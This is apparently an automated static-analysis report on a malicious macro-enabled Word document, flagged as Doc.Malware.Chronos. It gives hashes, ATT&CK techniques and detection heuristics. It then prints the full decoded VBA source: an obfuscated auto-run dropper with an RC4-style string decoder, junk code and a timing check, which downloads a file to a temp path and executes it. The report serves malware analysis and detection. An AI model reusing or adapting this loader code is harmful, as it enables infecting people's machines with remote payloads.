Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ec2d0f2f74bdc327…

MALICIOUS

Office (OOXML)

Size: 31.8 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-10-03
MD5: d9a13875b5a5a80036e54c98514b6c50
SHA-1: 30bf35b9961cdf818a7fe269e6bf045ba75e3666
SHA-256: ec2d0f2f74bdc32761a2b0aa4f7f14f27665ff496ccfba6cf4882e504008c51a
Risk Score: 400

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an Office document containing obfuscated VBA macros designed to execute automatically upon opening, as indicated by the 'Obfuscated auto-exec VBA loader' and 'Document_Open macro' heuristics. The document body presents a lure to "enable editing and content," a common tactic to bypass macro security. The VBA code likely downloads and executes a second-stage payload, though the exact mechanism is obfuscated. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further confirms its malicious nature.

Heuristics 12

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    GetObject 49, 9
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set BMpyNI4 = CreateObject(B0trB4VkXGxG(Chr(247) + Chr(219) + Chr(136) + Chr(232) + Chr(237) + Chr(188) + Chr(185) + Chr(170) + Chr(77) + Chr(246) + Chr(177) + Chr(250) + Chr(127) + Chr(151) + Chr(47) + Chr(56) + Chr(67), "U0P1fWvSZJ9dvGLm"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject 49, 9
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName MD85JoQg8QZ, 57, VbMethod, 58, 55, 64
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    JPBBYW4KHxDr2 = Environ(B0trB4VkXGxG(Chr(22) + Chr(2) + Chr(199) + Chr(135) + Chr(40) + Chr(42) + Chr(119), "IAMK9NVEQa49wR")) & "\" & OEDYrNLx4 & B0trB4VkXGxG(Chr(63) + Chr(147) + Chr(59) + Chr(226), "Xq9o06gvtPI")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12235 bytes
SHA-256: a45f2e5bd918b61073d0921991e4141d84b4dfac4ec92a0ba01ac92b6403bb44
Detection
ClamAV: No threats found
Obfuscation or payload: likely
94 of 165 identifiers look randomly generated (e.g. 'PM9kVHgUMJgVQAdft8k') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub PhfAo8J6jLCy(KdQ3zvNvXRFDJT As Long)
Dim SLE5zn1 As Long, KF3NJtOp As Long
SLE5zn1 = 9
KF3NJtOp = 55
If SLE5zn1 + KF3NJtOp > 2 Then
KF3NJtOp = SLE5zn1 + 89
Else
MsgBox 13
End If
Dim WSSRRiYpY8a As Long
Dim P8QIByQ2ympsU As Long, FJN As Long
P8QIByQ2ympsU = 1
FJN = 81
If P8QIByQ2ympsU + FJN > 2 Then
FJN = P8QIByQ2ympsU + 86
Else
MsgBox 70
End If
WSSRRiYpY8a = Timer + KdQ3zvNvXRFDJT
Do While Timer < WSSRRiYpY8a
DoEvents
Loop
Dim INJtOp37NFn0 As Long, KLvWfxW As Long
INJtOp37NFn0 = 95
KLvWfxW = 97
If INJtOp37NFn0 + KLvWfxW > 2 Then
KLvWfxW = INJtOp37NFn0 + 38
Else
MsgBox 41
End If
End Sub
Function B0trB4VkXGxG(ByVal QcPhWQX As String, ByVal UcWcHmMJanno As String) As String
Dim ItcKSFRO As Long, NgUP As Long
ItcKSFRO = 78
NgUP = 1
If ItcKSFRO + NgUP > 2 Then
NgUP = ItcKSFRO + 7
Else
MsgBox 35
End If
On Error Resume Next
Dim U7qseUfTf9 As Long, PM9kVHgUMJgVQAdft8k As Long
U7qseUfTf9 = 15
PM9kVHgUMJgVQAdft8k = 37
If U7qseUfTf9 + PM9kVHgUMJgVQAdft8k > 2 Then
PM9kVHgUMJgVQAdft8k = U7qseUfTf9 + 70
Else
MsgBox 98
End If
Dim QQ0GuOd01c(0 To 255) As Integer, EvjXPfT As Long, Mwp8E98bu3LV As Long, X94xNrXn76 As Long, Twks() As Byte, JrcBICw6QG() As Byte, BsGuFOg1ix As Byte
Dim KjWYNYX0DWh02 As Long, HVBgTKMxmsW As Long
KjWYNYX0DWh02 = 2
HVBgTKMxmsW = 51
If KjWYNYX0DWh02 + HVBgTKMxmsW > 2 Then
HVBgTKMxmsW = KjWYNYX0DWh02 + 28
Else
MsgBox 23
End If
Twks() = StrConv(UcWcHmMJanno, vbFromUnicode)
Dim GR8YHtb2SoR7K As Long, VuNA6Jr6NZ As Long
GR8YHtb2SoR7K = 47
VuNA6Jr6NZ = 65
If GR8YHtb2SoR7K + VuNA6Jr6NZ > 2 Then
VuNA6Jr6NZ = GR8YHtb2SoR7K + 11
Else
MsgBox 74
End If
For EvjXPfT = 0 To 255
QQ0GuOd01c(EvjXPfT) = EvjXPfT
Next EvjXPfT
EvjXPfT = 0
Mwp8E98bu3LV = 0
X94xNrXn76 = 0
For EvjXPfT = 0 To 255
Mwp8E98bu3LV = (Mwp8E98bu3LV + QQ0GuOd01c(EvjXPfT) + Twks(EvjXPfT Mod Len(UcWcHmMJanno))) Mod 256
BsGuFOg1ix = QQ0GuOd01c(EvjXPfT)
QQ0GuOd01c(EvjXPfT) = QQ0GuOd01c(Mwp8E98bu3LV)
QQ0GuOd01c(Mwp8E98bu3LV) = BsGuFOg1ix
Next EvjXPfT
EvjXPfT = 0
Mwp8E98bu3LV = 0
X94xNrXn76 = 0
JrcBICw6QG() = StrConv(QcPhWQX, vbFromUnicode)
For EvjXPfT = 0 To Len(QcPhWQX)
Mwp8E98bu3LV = (Mwp8E98bu3LV + 1) Mod 256
X94xNrXn76 = (X94xNrXn76 + QQ0GuOd01c(Mwp8E98bu3LV)) Mod 256
BsGuFOg1ix = QQ0GuOd01c(Mwp8E98bu3LV)
QQ0GuOd01c(Mwp8E98bu3LV) = QQ0GuOd01c(X94xNrXn76)
QQ0GuOd01c(X94xNrXn76) = BsGuFOg1ix
JrcBICw6QG(EvjXPfT) = JrcBICw6QG(EvjXPfT) Xor (QQ0GuOd01c((QQ0GuOd01c(Mwp8E98bu3LV) + QQ0GuOd01c(X94xNrXn76)) Mod 256))
Next EvjXPfT
Dim Ihu0yw3bw As Long, Nf1jxBwqygWnZd As Long
Ihu0yw3bw = 52
Nf1jxBwqygWnZd = 53
If Ihu0yw3bw + Nf1jxBwqygWnZd > 2 Then
Nf1jxBwqygWnZd = Ihu0yw3bw + 49
Else
MsgBox 59
End If
B0trB4VkXGxG = StrConv(JrcBICw6QG, vbUnicode)
Dim R2vccmZMn2 As Long, K5P1VaW5PT As Long
R2vccmZMn2 = 70
K5P1VaW5PT = 95
If R2vccmZMn2 + K5P1VaW5PT > 2 Then
K5P1VaW5PT = R2vccmZMn2 + 93
Else
MsgBox 25
End If
End Function
Function OEDYrNLx4() As String
Dim S8mHrayf7 As Long, VSejaxwxNS8Z As Long
S8mHrayf7 = 69
VSejaxwxNS8Z = 70
If S8mHrayf7 + VSejaxwxNS8Z > 2 Then
VSejaxwxNS8Z = S8mHrayf7 + 67
Else
MsgBox 77
End If
Dim WGBcAfgJj() As Byte, MHbyRIEHDh() As Byte, RGp7Hy5lWQsukt As Long, W6rV5 As Long, H7aA As String, EDWfxW As String, Ia8cjtQXzQWv As Long
Dim VeN0I4CB6 As Long, UEPoGir30IBpQ3 As Long
VeN0I4CB6 = 93
UEPoGir30IBpQ3 = 25
If VeN0I4CB6 + UEPoGir30IBpQ3 > 2 Then
UEPoGir30IBpQ3 = VeN0I4CB6 + 32
Else
MsgBox 37
End If
Ia8cjtQXzQWv = 0
Dim Nai As Long, RHoEpdpKSfxGtq As Long
Nai = 21
RHoEpdpKSfxGtq = 17
If Nai + RHoEpdpKSfxGtq > 2 Then
RHoEpdpKSfxGtq = Nai + 82
Else
MsgBox 60
End If
T6TccoSl2MfJO:
Dim H1iOzJB As Long, TsUkOIeu5vniF As Long
H1iOzJB = 59
TsUkOIeu5vniF = 54
If H1iOzJB + TsUkOIeu5vniF > 2 Then
TsUkOIeu5vniF = H1iOzJB + 97
Else
MsgBox 40
End If
Randomize
EDWfxW = Int(30 * Rnd)
If EDWfxW < 4 Then GoTo T6TccoSl2MfJO
Ia8cjtQXzQWv = EDWfxW
If Ia8cjtQXzQWv > 0& Then
Dim UGwNOQ As Long, Bp0LVOllEfC As Long
UGwNOQ = 73
Bp0LVOllEfC = 61
If UGwNOQ + Bp0LVOllEfC > 2 Then
Bp0LVOllEfC = UGwNOQ + 96
Else
MsgBox 90
End If
H7aA = B0trB4VkXGxG(Chr(150) + Chr(34) + Chr(224) + Chr(39) + Chr(108) + Chr(235) + Chr(147) + Chr(253) + Chr(191) + Chr(192), "XKPc2Kmbzzx")
Randomize
WGBcAfgJj = H7aA
RGp7Hy5lWQsukt = Len(H7aA) - 1&
Ia8cjtQXzQWv = (Ia8cjtQXzQWv * 2&) - 1&
ReDim MHbyRIEHDh(Ia8cjtQXzQWv) As Byte
Dim QH0CSOplDVMYqmFx As Long, RqCJ8AlK3TMvP As Long
QH0CSOplDVMYqmFx = 42
RqCJ8AlK3TMvP = 80
If QH0CSOplDVMYqmFx + RqCJ8AlK3TMvP > 2 Then
RqCJ8AlK3TMvP = QH0CSOplDVMYqmFx + 91
Else
MsgBox 7
End If
For W6rV5 = 0& To Ia8cjtQXzQWv Step 2&
MHbyRIEHDh(W6rV5) = WGBcAfgJj(CLng(RGp7Hy5lWQsukt * Rnd) * 2&)
Next
Dim FnNn5n1 As Long, HoX As Long
FnNn5n1 = 7
HoX = 14
If FnNn5n1 + HoX > 2 Then
HoX = FnNn5n1 + 64
Else
MsgBox 15
End If
End If
Dim K0MXThZkclEVOag As Long, I9aR4WmF As Long
K0MXThZkclEVOag = 91
I9aR4WmF = 29
If K0MXThZkclEVOag + I9aR4WmF > 2 Then
I9aR4WmF = K0MXThZkclEVOag + 45
Else
MsgBox 24
End If
OEDYrNLx4 = MHbyRIEHDh
Dim GPszXugzdzibRR3oS As Long, ETnyD6DCi As Long
GPszXugzdzibRR3oS = 61
ETnyD6DCi = 73
If GPszXugzdzibRR3oS + ETnyD6DCi > 2 Then
ETnyD6DCi = GPszXugzdzibRR3oS + 65
Else
MsgBox 87
End If
End Function
Sub Document_Open()
Dim QOgE1WWUM As Long, UkO79sC5qx As Long
QOgE1WWUM = 97
UkO79sC5qx = 65
If QOgE1WWUM + UkO79sC5qx > 2 Then
UkO79sC5qx = QOgE1WWUM + 9
Else
MsgBox 77
End If
Dim GpFp1Ewk As Long, Owda8x31kXR As Long, HTQHHox44EgB1 As Long
Dim JNNGR8IDe As Long, XsCRyrDoQQi As Long
JNNGR8IDe = 92
XsCRyrDoQQi = 81
If JNNGR8IDe + XsCRyrDoQQi > 2 Then
XsCRyrDoQQi = JNNGR8IDe + 61
Else
MsgBox 22
End If
GpFp1Ewk = 965118924: Owda8x31kXR = 0: HTQHHox44EgB1 = 0
Dim UxCFkT7MzjkO As Long, Hh8qe As Long
UxCFkT7MzjkO = 24
Hh8qe = 85
If UxCFkT7MzjkO + Hh8qe > 2 Then
Hh8qe = UxCFkT7MzjkO + 76
Else
MsgBox 77
End If
For Owda8x31kXR = 1 To GpFp1Ewk
HTQHHox44EgB1 = HTQHHox44EgB1 + 1
Next Owda8x31kXR
Dim I5ZBK91vP As Long, PpqBcrla9KqU As Long
I5ZBK91vP = 66
PpqBcrla9KqU = 60
If I5ZBK91vP + PpqBcrla9KqU > 2 Then
PpqBcrla9KqU = I5ZBK91vP + 4
Else
MsgBox 46
End If
If HTQHHox44EgB1 = GpFp1Ewk Then
Dim CLdsihkKGe4w5p As Long, AqUL As Long
CLdsihkKGe4w5p = 86
AqUL = 97
If CLdsihkKGe4w5p + AqUL > 2 Then
AqUL = CLdsihkKGe4w5p + 13
Else
MsgBox 92
End If
UA6bn
Dim Itrtc1lhg As Long, QCHoa5NYXO8HbVh As Long
Itrtc1lhg = 9
QCHoa5NYXO8HbVh = 6
If Itrtc1lhg + QCHoa5NYXO8HbVh > 2 Then
QCHoa5NYXO8HbVh = Itrtc1lhg + 15
Else
MsgBox 86
End If
Else
Dim VfcH12uNwqX252 As Long, DBX7egPflTwGqJNH0 As Long
VfcH12uNwqX252 = 44
DBX7egPflTwGqJNH0 = 59
If VfcH12uNwqX252 + DBX7egPflTwGqJNH0 > 2 Then
DBX7egPflTwGqJNH0 = VfcH12uNwqX252 + 28
Else
MsgBox 20
End If
Fhs8RtJyhYQ50
Dim US72HDJWta2 As Long, PM8r4wl5bFa7TX9LN As Long
US72HDJWta2 = 15
PM8r4wl5bFa7TX9LN = 38
If US72HDJWta2 + PM8r4wl5bFa7TX9LN > 2 Then
PM8r4wl5bFa7TX9LN = US72HDJWta2 + 70
Else
MsgBox 72
End If
End If
Dim UclAkFN As Long, OAPXaKx6icp As Long
UclAkFN = 59
OAPXaKx6icp = 52
If UclAkFN + OAPXaKx6icp > 2 Then
OAPXaKx6icp = UclAkFN + 74
Else
MsgBox 7
End If
End Sub
Sub Fhs8RtJyhYQ50()
Dim PjiomtPTovh As Long, YikyzeVrA As Long
PjiomtPTovh = 65
YikyzeVrA = 88
If PjiomtPTovh + YikyzeVrA > 2 Then
YikyzeVrA = PjiomtPTovh + 65
Else
MsgBox 60
End If
IPmt 11, 26, 6, 66
Beep
CallByName MD85JoQg8QZ, 57, VbMethod, 58, 55, 64
IsDate 36
NPer 49, 63, 94
If Abs(46) = 45 Then DYyK5M5dkFN = 7556
GetAllSettings 61, 45
WeekdayName 93
GetObject 49, 9
Sqr 5
DatePart "H31JEn54R", 69
Reset
Hour 48
FXtvYAmkp = EOF(87)
HDtwS8vsvCi459MQ = QBColor(68)
Err.Raise 51
TimeValue 77
Randomize
Weekday 97
Rnd
Atn 64
DDB 63, 39, 39, 91
LoadPicture 8, 32, 86, 24, 84
Rate 31, 65, 88
Second 65
App.LogEvent "HFkdiP5Wi7b"
Ib1SHn4XsKWY75 = Fix(60)
L7wIGGCp8M6 = UCase(49)
IsError 84
LOF 78
Dim LLsg0ybpp3B03mem As Long, OPLvgr3Np As Long
LLsg0ybpp3B03mem = 36
OPLvgr3Np = 97
If LLsg0ybpp3B03mem + OPLvgr3Np > 2 Then
OPLvgr3Np = LLsg0ybpp3B03mem + 15
Else
MsgBox 16
End If
End Sub
Sub UA6bn()
Dim BrO48zDd As Long, VUiJsZxQOl As Long
BrO48zDd = 44
VUiJsZxQOl = 72
If BrO48zDd + VUiJsZxQOl > 2 Then
VUiJsZxQOl = BrO48zDd + 14
Else
MsgBox 17
End If
Dim JPBBYW4KHxDr2 As String, BMpyNI4 As Object, Lo9NTXBQ4 As Integer
Dim QUoIwP2g0V As Long, HVS0pylKRpugG0g As Long
QUoIwP2g0V = 36
HVS0pylKRpugG0g = 50
If QUoIwP2g0V + HVS0pylKRpugG0g > 2 Then
HVS0pylKRpugG0g = QUoIwP2g0V + 53
Else
MsgBox 71
End If
JPBBYW4KHxDr2 = Environ(B0trB4VkXGxG(Chr(22) + Chr(2) + Chr(199) + Chr(135) + Chr(40) + Chr(42) + Chr(119), "IAMK9NVEQa49wR")) & "\" & OEDYrNLx4 & B0trB4VkXGxG(Chr(63) + Chr(147) + Chr(59) + Chr(226), "Xq9o06gvtPI")
Dim YXBXYsAwrnZ As Long, B87MAcD0BcLEt As Long
YXBXYsAwrnZ = 44
B87MAcD0BcLEt = 1
If YXBXYsAwrnZ + B87MAcD0BcLEt > 2 Then
B87MAcD0BcLEt = YXBXYsAwrnZ + 30
Else
MsgBox 66
End If
Set BMpyNI4 = CreateObject(B0trB4VkXGxG(Chr(247) + Chr(219) + Chr(136) + Chr(232) + Chr(237) + Chr(188) + Chr(185) + Chr(170) + Chr(77) + Chr(246) + Chr(177) + Chr(250) + Chr(127) + Chr(151) + Chr(47) + Chr(56) + Chr(67), "U0P1fWvSZJ9dvGLm"))
Dim OBOdDklYSCj As Long, LlKRpugG0gHE7F As Long
OBOdDklYSCj = 7
LlKRpugG0gHE7F = 63
If OBOdDklYSCj + LlKRpugG0gHE7F > 2 Then
LlKRpugG0gHE7F = OBOdDklYSCj + 67
Else
MsgBox 30
End If
BMpyNI4.Open B0trB4VkXGxG(Chr(81) + Chr(206) + Chr(231), "QkYZfa7FV"), B0trB4VkXGxG(Chr(31) + Chr(70) + Chr(102) + Chr(219) + Chr(30) + Chr(89) + Chr(24) + Chr(55) + Chr(170) + Chr(119) + Chr(83) + Chr(146) + Chr(197) + Chr(34) + Chr(190) + Chr(108) + Chr(229) + Chr(15) + Chr(231) + Chr(101) + Chr(34) + Chr(20) + Chr(39) + Chr(41) + Chr(187) + Chr(120) + Chr(206), "HZDYuCt8eoRGHcet"), False
Dim In3yYM8 As Long, SAWmkXG792Ghvo As Long
In3yYM8 = 74
SAWmkXG792Ghvo = 82
If In3yYM8 + SAWmkXG792Ghvo > 2 Then
SAWmkXG792Ghvo = In3yYM8 + 10
Else
MsgBox 29
End If
BMpyNI4.setRequestHeader B0trB4VkXGxG(Chr(169) + Chr(226) + Chr(199) + Chr(5) + Chr(96) + Chr(185) + Chr(245) + Chr(77) + Chr(12) + Chr(247), "MmA85Cr3xXuZh"), B0trB4VkXGxG(Chr(145) + Chr(17) + Chr(71) + Chr(185) + Chr(56) + Chr(89) + Chr(191) + Chr(21) + Chr(13) + Chr(79) + Chr(159), "QYpGByNkm")
BMpyNI4.send
If BMpyNI4.readyState = 4 And BMpyNI4.Status = 200 Then
Dim Lrm49lJe9lb As Long, NAcl3TwRj As Long
Lrm49lJe9lb = 18
NAcl3TwRj = 77
If Lrm49lJe9lb + NAcl3TwRj > 2 Then
NAcl3TwRj = Lrm49lJe9lb + 73
Else
MsgBox 38
End If
Lo9NTXBQ4 = FreeFile
Open JPBBYW4KHxDr2 For Binary Access Write Lock Write As #Lo9NTXBQ4
Put #Lo9NTXBQ4, , B0trB4VkXGxG(StrConv(BMpyNI4.ResponseBody, vbUnicode), B0trB4VkXGxG(Chr(185) + Chr(240) + Chr(32) + Chr(104) + Chr(216) + Chr(9) + Chr(21) + Chr(233) + Chr(157), "IJG7bN8UifENI8eEd"))
Close #Lo9NTXBQ4
Dim OongUnLSE4 As Long, GTajoCWrlOp As Long
OongUnLSE4 = 32
GTajoCWrlOp = 8
If OongUnLSE4 + GTajoCWrlOp > 2 Then
GTajoCWrlOp = OongUnLSE4 + 8
Else
MsgBox 60
End If
PhfAo8J6jLCy 1
Dim PB8ucaoRXU26x As Long, DFFrvzEX90OQv As Long
PB8ucaoRXU26x = 70
DFFrvzEX90OQv = 44
If PB8ucaoRXU26x + DFFrvzEX90OQv > 2 Then
DFFrvzEX90OQv = PB8ucaoRXU26x + 51
Else
MsgBox 2
End If
CreateObject(B0trB4VkXGxG(Chr(244) + Chr(104) + Chr(1) + Chr(144) + Chr(173) + Chr(217) + Chr(195) + Chr(123) + Chr(103) + Chr(10) + Chr(82) + Chr(100) + Chr(101), "JpZYe7cvFKW")).exec """" & JPBBYW4KHxDr2 & """"
Dim VYnfQC As Long, DRyBPb2W4jV As Long
VYnfQC = 47
DRyBPb2W4jV = 14
If VYnfQC + DRyBPb2W4jV > 2 Then
DRyBPb2W4jV = VYnfQC + 14
Else
MsgBox 88
End If
End If
Dim P5HFNmPRBKCD As Long, QIqF7fPZlp As Long
P5HFNmPRBKCD = 68
QIqF7fPZlp = 77
If P5HFNmPRBKCD + QIqF7fPZlp > 2 Then
QIqF7fPZlp = P5HFNmPRBKCD + 49
Else
MsgBox 36
End If
Set BMpyNI4 = Nothing
Dim YR4AteuC2b As Long, QTisL01PaeZLMQLxu As Long
YR4AteuC2b = 8
QTisL01PaeZLMQLxu = 5
If YR4AteuC2b + QTisL01PaeZLMQLxu > 2 Then
QTisL01PaeZLMQLxu = YR4AteuC2b + 15
Else
MsgBox 85
End If
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 32256 bytes
SHA-256: b8bc1fed05b1ae58b85ebaa7c925dfe8e6a86bb22e0ef86edd06663111b0f3bb
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely